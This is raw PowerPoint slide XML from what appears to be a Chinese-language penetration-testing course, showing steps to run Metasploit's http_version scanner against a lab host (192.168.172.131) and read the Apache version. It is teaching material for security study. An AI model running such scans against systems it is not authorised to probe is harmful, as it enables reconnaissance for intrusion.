                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="文本框 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317490" y="764858"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3.使用“show options”命令查看当前模块需要设置的参数，如图2-4-34所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317490" y="1410018"/>
            <a:ext cx="5276850" cy="2162175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="文本框 123"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317490" y="3572193"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-34 查看模块需要设置的参数4.使用“set RHOSTS 192.168.172.131”命令设置扫描目标主机地址，如图2-4-35所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317490" y="5048568"/>
            <a:ext cx="5276850" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="文本框 124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5317490" y="5629593"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-35 设置模块参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="522266"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具进行Http服务版本扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤五</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>05</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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17" name="矩形 16"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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19" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.3 服务版本扫描</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="125" name="文本框 124"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5842000" y="1731328"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.使用“exploit”或“run”命令运行http_version模块，如图2-4-36所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5842000" y="2376488"/>
            <a:ext cx="5276850" cy="933450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="文本框 125"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5842000" y="3309938"/>
            <a:ext cx="5080000" cy="2584450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-36 运行http_version模块       从扫描结果可以看到，这台主机安装了Web服务，服务版本是“Apache/2.2.8”。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="854075"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="854560"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
